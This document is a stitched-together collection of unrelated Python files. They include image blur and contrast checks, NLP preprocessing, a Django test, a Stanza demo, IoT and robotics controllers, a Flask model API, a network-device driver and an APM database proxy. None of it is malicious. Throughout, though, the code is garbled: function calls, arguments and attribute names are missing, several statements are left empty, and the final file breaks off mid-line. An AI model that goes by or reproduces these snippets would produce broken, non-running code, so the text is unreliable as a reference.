<gh_stars>0 import cv2 import numpy as np from skimage.exposure import is_low_contrast import matplotlib.pyplot as plt def check_contrast(path, method='rms'): ''' Check contrast of given images using RMS or Michelson method path : str path of given image method : str method 'rms' or 'mich' Returns None ''' img = cv2.imread(path) plt.figure() if method == 'rms': img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) contrast = img_grey.std() print(contrast, end = ' ') if(contrast > 45): print('Normal') plt.title('Normal') else: print('Low') plt.title('Low') elif method == 'mich': #michelson Y = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)[:,:,0] # compute min and max of Y min = int(np.min(Y)) max = int(np.max(Y)) # compute contrast contrast = (max-min)/(max+min) print(contrast, end = ' ') if(contrast > 0.8): print('Normal') plt.title('Normal') else: print('Low') plt.title('Low') plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB) ) def variance_of_laplacian(image): ''' Compute the Laplacian of the image and return its variance ''' return cv2.Laplacian(image, cv2.CV_64F).var() def check_blur(path): img = cv2.imread(path) img_gray = cv2.imread(path,0) var = variance_of_laplacian(img_gray) plt.figure() if var<100: print('Blurry') plt.title('Blurry') else: print('Normal') plt.title('Normal') plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB) ) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='FcarScan Task - Blur and Contrast check') parser.add_argument('--image', default='view1.jpeg', type=str, help='Path of the image file') parser.add_argument('--folder', default='False', type=str, help='True if path is a directory') parser.add_argument('--method', default='rms', type=str, help='RMS (rms) or Michelson (mich)') parser.add_argument('--choice', default='blur', type=str, help='Blur (blur) or Contrast (con) Analysis') args = parser.parse_args() if args.choice == 'blur': print('Blur Analysis') if args.folder == 'True': import os files = os.listdir(args.image) files = [os.path.join(args.image, file) for file in files] for file in files: print('Image name :', file, end=' ') check_blur(file) else: print('Image name :', args.image, end=' ') check_blur(args.image) else: if args.folder == 'True': import os files = os.listdir(args.image) files = [os.path.join(args.image, file) for file in files] for file in files: print('Image name :', file, end=' ') check_contrast(file, args.method) else: print('Image name :', args.image, end=' ') check_contrast(args.image,args.method)
import numpy as np import string import re import nltk'stopwords') stop_words = nltk.corpus.stopwords.words('english') class word_inform(): def __init__(self): self.inform = {} def wordinput(self): WI = input('문장을 입력해주세요 : ') # 문장 받아오기. WI = word input. WI = WI.replace('\n',' ') # 문단에 줄 내림이 있다면, 스페이스바로 바꿔주기 #be = {'am', 'is', 'are', 'be' , 'was', 'were'} # be 동사 저장. WI = WI.lower() #WI = WI.replace("i'm",'i am') # be동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("he's",'he is') # be동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("she's",'she is') # be동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("that's",'that is') # be동사를 찾아내기 위해, 변환을 해준다 #WI = WI.replace("what's",'what is') # be동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("it's",'it is') # be동사를 찾아내기 위해, 변환을 해준다. (is 줄임말 풀어주기.) #WI = WI.replace("you're",'you are') # be동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("they're",'they are') # be동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("we're",'we are') # be동사를 찾아내기 위해, 변환을 해준다. #Auxiliary_verb = {'will','would','can','could','shall','should','may','might','must'} #WI = WI.replace("i'll",'i will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("you'll",'you will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("they'll",'they will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("we'll",'we will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("he'll",'he will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("she'll",'she will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("it'll",'it will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("that'll",'that will') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("i'd",'i would') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("you'd",'you would') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("they'd",'they would') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("we'd",'we would') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("he'd",'he would') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = WI.replace("she'd",'she would') # 조동사를 찾아내기 위해, 변환을 해준다. #WI = re.sub("[.]{2,}",'',WI) # 마침표 두개이상 없애기 WI = re.sub('[\\w.]+@[\\w.]+',' ',WI) WI = re.sub("[?!'.]{1,}",'.',WI) WI = re.sub("[^\w\s'.]+",'',WI) # 특수문자 제거하기 따옴표는 제거하지 않음... >> stop words에 포함된 단어 you'll 같은 거 때문. WI = re.sub("[.]{1,}",'.',WI) sentence = WI.strip(string.punctuation).split('.') # 문단에 마침표가 있다면, 문장을 분리해주기. 마지막에 있는 구두점 떼어주기. sentence_words = [s.split() for s in sentence] # 각각의 문장속에 있는 단어 분리 해주기. self.inform['sentence_words'] = sentence_words def word_voc(self,voc): before_voc_length = len(voc) sentence_words = self.inform['sentence_words'] # 입력받은 문장 그대로. for length in range(len(sentence_words)): for vocab in sentence_words[length]: if vocab.isdigit() == False: # 숫자가 계속 학습하는 문장에 들어가서 학습 효율이 떨어지는 듯 하다. ( 따라서 숫자는 제외한다.) if vocab not in stop_words: if vocab not in voc: voc.append(vocab) self.inform['voc'] = voc after_voc_length = len(voc) self.inform['voc_length_diff'] = (after_voc_length - before_voc_length) self.inform['voc_length'] = after_voc_length word_vector = [[] for i in sentence_words] word_sentence = [[] for i in sentence_words] voc_vectors = [] for word in voc: voc_vector = np.zeros_like(voc, dtype = int)# 단어장 크기의 새로운 벡터를 만든다. index_of_input_word = voc.index(word) voc_vector[index_of_input_word] += 1 # 한단어가 단어장의 몇번 index에 있는지를 확인. voc_vectors.append(voc_vector) self.inform['voc_vectors'] = voc_vectors # word_vector >> 입력받은 문장들을 단어별로 구분해 놓은 리스트. for length in range(len(sentence_words)): for word in sentence_words[length]: if word.isdigit() == False: # 숫자가 계속 학습하는 문장에 들어가서 학습 효율이 떨어지는 듯 하다. ( 따라서 숫자는 제외한다.) if word not in stop_words: voc_vector = np.zeros_like(voc, dtype = int)# 단어장 크기의 새로운 벡터를 만든다. index_of_input_word = voc.index(word) voc_vector[index_of_input_word] += 1 # 한단어가 단어장의 몇번 index에 있는지를 확인. word_vector[length].append(voc_vector) word_sentence[length].append(word) self.inform['sentence_words'] = word_sentence self.inform['word_vector'] = word_vector
from base import BaseTestCase from django.contrib.auth.models import User from redistricting.models import * class StatisticsSetTestCase(BaseTestCase): fixtures = [ 'redistricting_testdata.json', 'redistricting_testdata_geolevel2.json', 'redistricting_statisticssets.json', ] def setUp(self): super(StatisticsSetTestCase, self).setUp() display = ScoreDisplay.objects.get(title='Demographics') summary = ScorePanel.objects.get(title='Plan Summary') demographics = ScorePanel.objects.get(title='Demographics') display.scorepanel_set.add(summary) display.scorepanel_set.add(demographics) functions = ScoreFunction.objects.filter( name__in=('Voting Age Population', 'Hispanic voting-age population', 'Total Population')) demographics.score_functions = functions.all() self.functions = functions.all() self.demographics = demographics self.summary = summary self.display = display def tearDown(self): self.display.delete() super(StatisticsSetTestCase, self).tearDown() def test_copy_scoredisplay(self): user = User(username="Stats User") # We'll set the owner but it's overwritten copy = ScoreDisplay(owner=user) copy = copy.copy_from(display=self.display) self.assertEqual( "%s copy" % self.display.__unicode__(), copy.__unicode__(), "ScoreDisplay title copied, allowing same name for user more than once" ) self.assertEqual( len(copy.scorepanel_set.all()), len(self.display.scorepanel_set.all()), "Copied scoredisplay has wrong number of panels attached") self.assertNotEqual( user, copy.owner, "ScoreDisplay copied owner rather than copying owner from ScoreDisplay" ) copy = ScoreDisplay(owner=user) copy = copy.copy_from(display=self.display, owner=user) self.assertEqual(self.display.__unicode__(), copy.__unicode__(), "Title of scoredisplay not copied") self.assertEqual( len(copy.scorepanel_set.all()), len(self.display.scorepanel_set.all()), "Copied scoredisplay has wrong number of panels attached") vap = ScoreFunction.objects.get(name="Voting Age Population") copy = copy.copy_from( display=self.display, functions=[unicode(str(], title="Copied from") self.assertEqual( len(copy.scorepanel_set.all()), len(self.display.scorepanel_set.all()), "Copied scoredisplay has wrong number of panels attached") new_demo = ScoreDisplay.objects.get(title="Copied from") panels_tested = 0 for panel in new_demo.scorepanel_set.all(): if panel.title == "Plan Summary": self.assertEqual( len(self.summary.score_functions.all()), len(panel.score_functions.all()), "Copied plan summary panel didn't have correct number of functions" ) panels_tested += 1 elif panel.title == "Demographics": self.assertEqual(1, len( panel.score_functions.all() ), "Copied demographics panel didn't have correct number of functions" ) panels_tested += 1 self.assertEqual(2, panels_tested, "Copied scoredisplay didn't have both panels needed") # Let's try just updating those score functions new_copy = ScoreDisplay(owner=user) new_copy = copy.copy_from(display=copy, functions=self.functions) self.assertEqual(copy.title, new_copy.title, "Title of scoredisplay not copied") self.assertEqual(,, "Scorefunctions not added to current display") self.assertEqual( len(copy.scorepanel_set.all()), len(new_copy.scorepanel_set.all()), "Copied scoredisplay has wrong number of panels attached") panels_tested = 0 for panel in new_copy.scorepanel_set.all(): if panel.title == "Plan Summary": self.assertEqual( len(self.summary.score_functions.all()), len(panel.score_functions.all()), "Copied plan summary panel didn't have correct number of functions" ) panels_tested += 1 elif panel.title == "Demographics": self.assertEqual( len(self.functions), len(panel.score_functions.all()), "Copied demographics panel didn't have correct number of functions; e:%d,a:%d" % (3, len(panel.score_functions.all()))) panels_tested += 1 self.assertEqual(2, panels_tested, "Copied scoredisplay didn't have both panels needed")
<filename> #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Some simple usage examples of the stanfordnlp Stanza library The original Colab notebook where this script came from: Colab notebook on scispaCy: This script requires the 'stanza' and 'nltk' modules, I'd highly recommend you install both libraries under an isolated python virtual environment and avoid borking your system's python installation Some extra info: Python version: 3.8.6 OS: arch linux """ # Importing modules import re import stanza import nltk # The path where downloads should be saved. By default it points to your user's # HOME directory on linux/macos, no idea where it does it on windows. STANZA_DOWNLOAD_DIR = './stanza_resources' # Downloading the biomedical models # Our main pipeline, trained with the CRAFT corpus'en', dir=STANZA_DOWNLOAD_DIR, package='craft') # The NER models'en', dir=STANZA_DOWNLOAD_DIR, package='jnlpba')'en', dir=STANZA_DOWNLOAD_DIR, package='linnaeus')'en', dir=STANZA_DOWNLOAD_DIR, package='s800') # Initializing the document annotator nlp = stanza.Pipeline(lang='en', dir=STANZA_DOWNLOAD_DIR, package='craft') # Defining the text # The text below was extracted from the 2019 BioNLP OST `BB-Rel` task, document # `BB-rel-14633026.txt` from the Development dataset. # # Task URL: text = """ Characterization of a mosquitocidal Bacillus thuringiensis serovar sotto strain isolated from Okinawa, Japan. To characterize the mosquitocidal activity of parasporal inclusions of the Bacillus thuringiensis serovar sotto strain 96-OK-85-24, for comparison with two well-characterized mosquitocidal strains. The strain 96-OK-85-24 significantly differed from the existing mosquitocidal B. thuringiensis strains in: (1) lacking the larvicidal activity against Culex pipiens molestus and haemolytic activity, and (2) SDS-PAGE profiles, immunological properties and N-terminal amino acid sequences of parasporal inclusion proteins. It is clear from the results that the strain 96-OK-85-24 synthesizes a novel mosquitocidal Cry protein with a unique toxicity spectrum. This is the first report of the occurrence of a mosquitocidal B. thuringiensis strain with an unusual toxicity spectrum, lacking the activity against the culicine mosquito. """ print(text) # Removing newlines # The line below will replace newlines with a single whitespace, then any # trailing spaces will be trimmed. We'll leave sentence segmentation for the # trained model to handle. text = re.sub(r'\n+', ' ', text).strip() print(text) # Annotating the document # Just call `nlp(STRING)` and that's pretty much it doc = nlp(text) # Tokenization, Lemmas and Part-of-Speech (PoS) and Sentence Segmentation # An annotated document will have the following [structure][stanza-objs]: # * A `document` contains `sentences`; # * A `sentence` contains `tokens`/`words`; # * A `token` contains one of more `words`; # note: On stanza there is a distiction between a [Token][stanza-token] and a # [Word][stanza-word] object. # Unlike `spacy`, in order to access a word's properties (e.g.: lemma, PoS # tags, etc.) you must iterate over the document's sentences and then iterate # over each sentences to get their tokens/words (wich also means their token # IDs are relative to the sentences they're from, you'll see down below). In # general, a stanza code looks something like this: # for sent in doc.sentences: # # Operating on the document sentences # # At this level you get the semantic dependencies # # for token in sent.tokens: # # Operating on the sentence's tokens # # for word in sent.words: # # Operating on the sentence's words # # # # for (i, sent) in enumerate(doc.sentences): print(f'SENTENCE {i+1}') print(' ID TEXT LEMMA UPOS POS') for word in sent.words: print(f'{>4} {word.text:>20} {word.lemma:<20} {word.upos:>5}', f'{word.xpos:<5}') print() # Semantic Dependency Parsing # Semantic dependency information can be accessed at sentence level print(' ID TEXT DEP HEAD TEXT HEAD ID') for (i, sent) in enumerate(doc.sentences): print(f'SENTENCE {i+1}') print(' ID WORD TEXT <---DEP--- HEAD TEXT ID') for dep in sent.dependencies: # Using 'Source' and 'Target' here as a reference to the semantic # dependency arrow direction [src_word, deprel, tgt_word] = dep print(f'{>4} {tgt_word.text:>20} <{deprel:-^9}', f'{src_word.text:<20} {>4}') print() # Noun Chunks # The stanza framework has no built-in chunking, instead we'll be using the # `nltk` module and its example noun chunk grammar: # # <DT>?<JJ.*>*<NN.*>+ # # * `<DT>?` - An optional determiner; # * `<JJ.*>*` - Zero or more adjectives; # * `<NN.*>+` - One or more nouns. # # where: # * `?` means zero or one of the previous pattern; # * `*` means zero or more of the previous pattern; # * `+` means one or more of the previous pattern; # * `.` means any (single) character. # # def print_chunks(doc: stanza.Document, grammar: str, print_full_tree: bool = True): """ Print a document's chunks Arguments: doc: stanza.Document An (PoS) annotated document grammar: str An nltk chunk grammar regular expression print_full_tree: True|False If true, print the whole tree, else print only the matching grammar chunks """ cp = nltk.RegexpParser(grammar) for (i, sent) in enumerate(doc.sentences): print(f'SENTENCE {i+1}') sentence = [(w.text, w.xpos) for w in sent.words] chunk_tree = cp.parse(sentence) if print_full_tree is True: print(chunk_tree, end='\n\n') else: for subtree in chunk_tree.subtrees(): if subtree.label() == 'NP': print(subtree) print() grammar = 'NP: {<DT>?<JJ.*>*<NN.*>+}' print_chunks(doc, grammar, print_full_tree=False) print_chunks(doc, grammar, print_full_tree=True) # Named Entity Recognition (NER) # From stanza's available NER models we'll test the JNLPBA, Linnaeus and S800 # models # # def show_ner(text: str, ner_model: str): """ Just a shortcut to annotate the text with the given NER model """ nlp = stanza.Pipeline(lang='en', package='craft', dir=STANZA_DOWNLOAD_DIR, processors={'ner': ner_model}) doc = nlp(text) print(f'\nNER MODEL: {ner_model}') print('TYPE TEXT') for ent in doc.entities: print(f'{ent.type:<10} {ent.text}') show_ner(text, 'jnlpba') show_ner(text, 'linnaeus') show_ner(text, 's800')
<filename>boj/ import sys; input=sys.stdin.readline for _ in range(int(input())): n, *scores = map(int, input().split()) average = sum(scores) / len(scores) answer = len(list(filter(lambda x: x > average, scores))) / len(scores) print(f"{answer:.3%}")
<filename>dhbwFischertechnik/factoryWebsite/ import json from asgiref.sync import async_to_sync from channels.layers import get_channel_layer from factoryWebsite.models import Order from factoryWebsite.utils import sendNewOrderToFactory monitorMainUnit = False temperatureMainUnit = "" voltageMainUnit = "" monitorSortingLine = False colorSortingLine = "" temperatureSortingLine = "" voltageSortingLine = "" def Status_Data_Handler(topic, data): json_Dict = json.loads(data) message = json_Dict['Text'] short_topic = topic.partition("Status/")[2] customer_group_name = 'name_%s' % short_topic channel_layer = get_channel_layer() async_to_sync(channel_layer.group_send)( customer_group_name, { 'type': 'status_message', 'message': message } ) def Monitoring_Data_Handler(topic, data): global colorSortingLine, temperatureSortingLine, voltageSortingLine, temperatureMainUnit, voltageMainUnit, \ monitorSortingLine, monitorMainUnit json_Dict = json.loads(data) if topic == "Monitor/MainUnit": temperatureMainUnit = json_Dict['Temperature'] voltageMainUnit = json_Dict['Voltage'] monitorMainUnit = True elif topic == "Monitor/SortingLine": colorSortingLine = json_Dict['Color'] temperatureSortingLine = json_Dict['Temperature'] voltageSortingLine = json_Dict['Voltage'] monitorSortingLine = True if monitorMainUnit and monitorSortingLine: monitorMainUnit = False monitorSortingLine = False channel_layer = get_channel_layer() async_to_sync(channel_layer.group_send)( 'sensors_monitoring', { 'type': 'monitoring_message', 'colorSortingLine': colorSortingLine, 'temperatureSortingLine': temperatureSortingLine, 'voltageSortingLine': voltageSortingLine, 'temperatureMainUnit': temperatureMainUnit, 'voltageMainUnit': voltageMainUnit } ) def Storage_Data_Handler(data): json_Dict = json.loads(data) channel_layer = get_channel_layer() async_to_sync(channel_layer.group_send)( 'storage_monitoring', { 'type': 'storage_message', 'storage0': json_Dict['Storage0'], 'storage1': json_Dict['Storage1'], 'storage2': json_Dict['Storage2'], 'storage3': json_Dict['Storage3'], 'storage4': json_Dict['Storage4'], 'storage5': json_Dict['Storage5'], 'storage6': json_Dict['Storage6'], 'storage7': json_Dict['Storage7'], 'storage8': json_Dict['Storage8'] } ) def Order_Ready_Data_Handler(data): json_Dict = json.loads(data) last_id = json_Dict['LastId'] try: recentOrder = Order.objects.get(transaction_id=last_id) recentOrder.finished = True # recentOrder.delete() except Order.DoesNotExist: pass sendNewOrderToFactory(True) def topic_Data_Handler_QoS_0(topic, data): if topic.startswith("Monitor"): Monitoring_Data_Handler(topic, data) elif topic == "Storage/Factory": Storage_Data_Handler(data) def topic_Data_Handler_QoS_2(topic, data): if topic.startswith("Status"): Status_Data_Handler(topic, data) elif topic == "Order/Ready": Order_Ready_Data_Handler(data)
# Homework 5 for Principles of Computing class, by k., 07/19/2014 # Question 1 class Incrementer(object): ''' counting increments separately from the function ''' def __init__(self, count): self.count = count def increment(self): self.count += 1 """ Recursion according to the "Cat in the Hat" """ def get_next_cat(current_cat): """ Helper function to get next cat """ if current_cat == "Cat in the Hat": return "Little Cat A" elif current_cat != "Little Cat Z": return "Little Cat " + chr(ord(current_cat[-1]) + 1) else: return "Voom" def clean_up(helper_cat): """ Recursive function that prints out story """ if helper_cat == "Voom": print helper_cat + ": I got this. Mess is all cleaned up!" else: next_cat = get_next_cat(helper_cat) print helper_cat + ": I'll have", next_cat, "clean up!" clean_up(next_cat) i.increment() # get those cats to work!!!!! print 'Question 1 prep...' i = Incrementer(0) clean_up("Cat in the Hat") i.increment() print 'Question 1 answer:', i.count # Question 2 def add_up(n): if n == 0: return 0 else: return n + add_up(n - 1) print '\nPrep for Question 2 follows...' print 'when n is 0:', add_up(0) print 'when n is 1:', add_up(1) print 'when n is 2:', add_up(2) print 'when n is 3:', add_up(3) print 'when n is 4:', add_up(4) print 'when n is 5:', add_up(5) print 'when n is 6:', add_up(6) print 'when n is 7:', add_up(7) print 'when n is 8:', add_up(8) # Question 3 def multiply_up(n): if n == 0: return 1 else: return n * multiply_up(n - 1) print '\nPrep for Question 3 follows...' print 'when n is 0:', multiply_up(0) print 'when n is 1:', multiply_up(1) print 'when n is 2:', multiply_up(2) print 'when n is 3:', multiply_up(3) print 'when n is 4:', multiply_up(4) print 'when n is 5:', multiply_up(5) print 'when n is 6:', multiply_up(6) print 'when n is 7:', multiply_up(7) print 'when n is 8:', multiply_up(8) # Question 4 def fib(num): if num == 0: return 0 elif num == 1: return 1 else: j.increment() return fib(num - 1) + fib(num - 2) print '\nPrep for Question 4 follows...' j = Incrementer(0) fib(2) print 'when n is 2:', j.count j = Incrementer(0) fib(3) print 'when n is 3:', j.count j = Incrementer(0) fib(4) print 'when n is 4:', j.count j = Incrementer(0) fib(5) print 'when n is 5:', j.count j = Incrementer(0) fib(6) print 'when n is 6:', j.count j = Incrementer(0) fib(7) print 'when n is 7:', j.count j = Incrementer(0) fib(8) print 'when n is 8:', j.count # Question 5 def memoized_fib(num, memo_dict): k.increment() if num in memo_dict: return memo_dict[num] else: sum1 = memoized_fib(num - 1, memo_dict) #k.increment() sum2 = memoized_fib(num - 2, memo_dict) #k.increment() memo_dict[num] = sum1 + sum2 return sum1 + sum2 print '\nPrep for Question 5 follows...' k = Incrementer(0) memoized_fib(0, {0 : 0, 1 : 1}) print 'when n is 0:', k.count k = Incrementer(0) memoized_fib(1, {0 : 0, 1 : 1}) print 'when n is 1:', k.count k = Incrementer(0) memoized_fib(2, {0 : 0, 1 : 1}) print 'when n is 2:', k.count k = Incrementer(0) memoized_fib(3, {0 : 0, 1 : 1}) print 'when n is 3:', k.count k = Incrementer(0) memoized_fib(4, {0 : 0, 1 : 1}) print 'when n is 4:', k.count k = Incrementer(0) memoized_fib(5, {0 : 0, 1 : 1}) print 'when n is 5:', k.count k = Incrementer(0) memoized_fib(6, {0 : 0, 1 : 1}) print 'when n is 6:', k.count k = Incrementer(0) memoized_fib(7, {0 : 0, 1 : 1}) print 'when n is 7:', k.count # Question 6 def outcomes(word): ''' generate (function shall be recursive!) all strings that can be composed from the letters in word in any order; returns a list of all strings that can be formed from the letters in word ''' # base case; no string if not word: return [''] possibilities = [] # generate all appropriate strings for rest of the word for string in outcomes(word[1:]): l.increment() for index in range(len(string) + 1): # inserting the initial character in all possible positions within the string possibilities.append(string[:index] + word[0] + string[index:]) l.increment() return outcomes(word[1:]) + possibilities print '\nPrep for Question 6 follows...' l = Incrementer(0) outcomes('a') print 'when n is 1:', l.count l = Incrementer(0) outcomes('ab') print 'when n is 2:', l.count l = Incrementer(0) outcomes('abc') print 'when n is 3:', l.count l = Incrementer(0) outcomes('abcd') print 'when n is 4:', l.count l = Incrementer(0) outcomes('abcde') print 'when n is 5:', l.count l = Incrementer(0) outcomes('abcdef') print 'when n is 6:', l.count l = Incrementer(0) outcomes('abcdefg') print 'when n is 7:', l.count
import argparse import serial import os parser = argparse.ArgumentParser() parser.add_argument('image', default='kernel8.img', type=str) parser.add_argument('device',default='/dev/ttyUSB0', type=str) args = parser.parse_args() try: ser = serial.Serial(args.device,115200) except: print("Serial init failed!") exit(1) file_path = args.image file_size = os.stat(file_path).st_size ser.write(file_size.to_bytes(4, byteorder="big")) print("Sending kernel...") with open(file_path, 'rb', buffering = 0) as f: for i in range(file_size): ser.write( print(ser.readline()) print("done")
#!/usr/bin/env python3.4 import webSocketClient import motorInterface import json axis = ['xLeft', 'yLeft', 'triggerLeft', 'xRight', 'yRight', 'triggerRight'] buttons = ['A', 'B', 'X', 'Y', 'LB', 'RB'] trimUp = { 'center': 0.0 } # these are in a row # this motor is IN3/4 on the edge of the motor controller m1 = motorInterface.motor(16, 26) # vertical m2 = motorInterface.motor(12, 13) # unused # 2nd chip m3 = motorInterface.motor(27, 23) # side (maybe left) m4 = motorInterface.motor(4, 18) # side (maybe right) def move1(pow): m1.set(pow) def move2(pow): m2.set(pow) def move3(pow): m3.set(pow) def move4(pow): m4.set(pow) justPressed = [ { 'A': False, 'B': False, 'X': False, 'Y': False, 'LB': False, 'RB': False }, { 'A': False, 'B': False, 'X': False, 'Y': False, 'LB': False, 'RB': False } ] def buttonPressed(button, num): global trimUp # num is 0 or 1 if num == 1: # controller number 2 if button == 'LB': trimUp['center'] += 1 elif button == 'RB': trimUp['center'] -= 1 def process(data): joysticks = json.loads(data) assert len(joysticks) == 24 joystick1 = dict(zip(axis + buttons, joysticks[:12])) joystick2 = dict(zip(axis + buttons, joysticks[12:])) old = [] # for debugging #print('msg:', joysticks) del data global justPressed stickNum = 0 for stick, jPressed in zip((joystick1, joystick2), justPressed): for k in stick: if k not in buttons: continue v = stick[k] if v == 1 and not jPressed[k]: # just pressed buttonPressed(k, stickNum) jPressed[k] = True elif v == 0 and jPressed[k]: # just released jPressed[k] = False elif v not in [1, 0]: raise ValueError('Got {0}, expected 0 or 1'.format(v)) else: pass stickNum += 1 del stickNum yLeft = 50 * joystick2['yLeft'] #xLeft = 50 * joystick2['xLeft'] yRight = 50 * joystick2['yRight'] #xRight = 50 * joystick2['xRight'] joystick2['triggerRight'] = (joystick2['triggerRight'] + 1) / 2 joystick2['triggerLeft'] = (joystick2['triggerLeft'] + 1) / 2 vertical = 0 if joystick2['triggerRight'] >= 0.1 and joystick2['triggerLeft'] >= 0.1: pass # do nothing cause both are pressed else: if joystick2['triggerRight'] > 0.1: # spin right vertical = joystick2['triggerRight'] * 50 if joystick2['triggerLeft'] > 0.1: # spin left vertical = -joystick2['triggerLeft'] * 50 # Mini-ROV motor setup # top view # ____ # | | # /a\| |/b\ # |____| # (up) # motor_a = yLeft motor_b = yRight global trimUp motor_up = trimUp['center'] + vertical def bounds(x): # max power is -100 to 100 if x < -50: return -50 if x > 50: return 50 return round(x, 2) motor_a = bounds(motor_a) motor_b = bounds(motor_b) motor_up = bounds(motor_up) # right move1(motor_up) move4(motor_a) move3(motor_b) # print datalist for i in range(30): print('\r\033[A\033[K', end='') print('Trim: {0}'.format(trimUp['center'])) print(joystick1) print(joystick2) print(motor_a, motor_b) print(motor_up) print() index = 0 for i in old: print(index, i) index += 1 webSocketClient.start('miniROV', process, ip="")
<filename> import pandas as pd import tensorflow_decision_forests as tfdf from flask import Flask from flask import jsonify from flask import request from tensorflow import keras app = Flask(__name__) model = keras.models.load_model("gb_model") @app.route("/predict", methods=["POST"]) def predict(): data = request.json df = tfdf.keras.pd_dataframe_to_tf_dataset(pd.DataFrame(data, index=[0])) prediction = model.predict(df) return jsonify({"survival": str(prediction.flatten()[0])}) @app.route("/predict_batch", methods=["POST"]) def predict_batch(): data = request.json df = tfdf.keras.pd_dataframe_to_tf_dataset(pd.DataFrame(data)) predictions = model.predict(df) return jsonify({"survival_batch": [str(i) for i in predictions.flatten()]}) if __name__ == "__main__":
<filename>scrapli_community/nokia/srlinux/ """""" from scrapli.driver import AsyncNetworkDriver async def default_async_on_open(conn: AsyncNetworkDriver) -> None: """ nokia_srlinux on_open callable Args: conn: AsyncNetworkDriver object Returns: None Raises: N/A """ await conn.acquire_priv(desired_priv=conn.default_desired_privilege_level) await conn.send_command(command="environment cli-engine type basic") await conn.send_command(command="environment complete-on-space false") async def default_async_on_close(conn: AsyncNetworkDriver) -> None: """ nokia_srlinux default on_close callable Args: conn: AsyncNetworkDriver object Returns: None Raises: N/A """ await conn.acquire_priv(desired_priv=conn.default_desired_privilege_level)"logout")
<gh_stars>1-10 from config.loader import Default from input.enums import Stick, Button, Trigger from input.action_space import ControllerState import zmq import os import platform class Pad(Default): """Writes out controller inputs.""" action_dim = 50 def __init__(self, path, player_id, port=None): super(Pad, self).__init__() """Create, but do not open the fifo.""" self.pipe = None self.path = path + 'georges_' + str(player_id) = port is not None self.port = port self.player_id = player_id self.message = "" self.action_space = [] self.previous_state = ControllerState() def connect(self): if context = zmq.Context() with open(self.path, 'w') as f: f.write(str(self.port)) self.pipe = context.socket(zmq.PUSH) address = "tcp://" % self.port print("Binding pad %s to address %s" % (self.path, address)) self.pipe.bind(address) else: try: os.unlink(self.path) except: pass os.mkfifo(self.path) self.pipe = open(self.path, 'w', buffering=1) def unbind(self): if not self.pipe.close() try: os.unlink(self.path) except Exception: pass self.message = "" def flush(self): if self.pipe.send_string(self.message) else: self.pipe.write(self.message) self.message = "" def write(self, command, buffering=False): self.message += command + '\n' if not buffering: self.flush() def press_button(self, button, buffering=False): """Press a button.""" #assert button in Button or button in UsefullButton self.write('PRESS {}'.format(button), buffering) def release_button(self, button, buffering=False): """Release a button.""" #assert button in Button or button in UsefullButton self.write('RELEASE {}'.format(button), buffering) def press_trigger(self, trigger, amount, buffering=False): """Press a trigger. Amount is in [0, 1], with 0 as released.""" #assert trigger in Trigger or trigger in UsefullButton #assert 0 <= amount <= 1 self.write('SET {} {:.2f}'.format(trigger, amount), buffering) def tilt_stick(self, stick, x, y, buffering=False): """Tilt a stick. x and y are in [0, 1], with 0.5 as neutral.""" #assert stick in Stick #assert 0 <= x <= 1 and 0 <= y <= 1 self.write('SET {} {:.2f} {:.2f}'.format(stick, x, y), buffering) def reset(self): for button in Button: self.release_button(button) for trigger in Trigger: self.press_trigger(trigger, 0) for stick in Stick: self.tilt_stick(stick, 0.5, 0.5)
Special Midterm Exam in
<gh_stars>0 from tkinter import * window = Tk() window.title("Special Midterm Exam in OOP") window.geometry("300x200+20+10") def changecolor(): button.configure(bg="yellow") button = Button(window, text = "Click to Change Color", command= changecolor), y=100, anchor="center") window.mainloop()
from apminsight import constants from apminsight.util import is_non_empty_string from apminsight.agentfactory import get_agent from .wrapper import default_wrapper class CursorProxy(): def __init__(self, cursor, conn): self._apm_wrap_cursor = cursor self._apm_wrap_conn = conn self._apm_check_and_wrap('execute') self._apm_check_and_wrap('executemany') def __getattr__(self, key): if key in self.__dict__: return getattr(self, key) return getattr(self._apm_wrap_cursor, key) def __setattr__(self, key, value): if( key in ['_apm_wrap_cursor', '_apm_wrap_conn', 'execute', 'executemany']): self.__dict__[key] = value else: return setattr(self._apm_wrap_conn, key, value) def _apm_check_and_wrap(self, attr): if hasattr(self._apm_wrap_cursor, attr): actual = getattr(self._apm_wrap_cursor, attr) attr_info = { constants.method_str : attr, constants.component_str : self._apm_wrap_conn._apm_comp_name, constants.extract_info : self._apm_extract_query, constants.is_db_tracker : True } wrapper = default_wrapper(actual, 'Cursor', attr_info) setattr(self, attr, wrapper) def _apm_extract_query(self, tracker, args=(), kwargs={}, return_value=None): tracker.set_info(self._apm_wrap_conn._apm_host_info) threshold = get_agent().get_threshold() if threshold.is_sql_capture_enabled() is not True: return if isinstance(args, (list, tuple)) and len(args)>0: if is_non_empty_string(args[0]): tracker.set_info({'query' : args[0]}) class ConnectionProxy(): def __init__(self, conn, comp, host_info): self._apm_wrap_conn = conn self._apm_comp_name = comp self._apm_host_info = host_info def cursor(self, *args, **kwargs): real_cursor = self._apm_wrap_conn.cursor(*args, **kwargs) cur = CursorProxy(real_cursor, self) return cur def __getattr__(self, key): if key in self.__dict__: return getattr(self, key) return 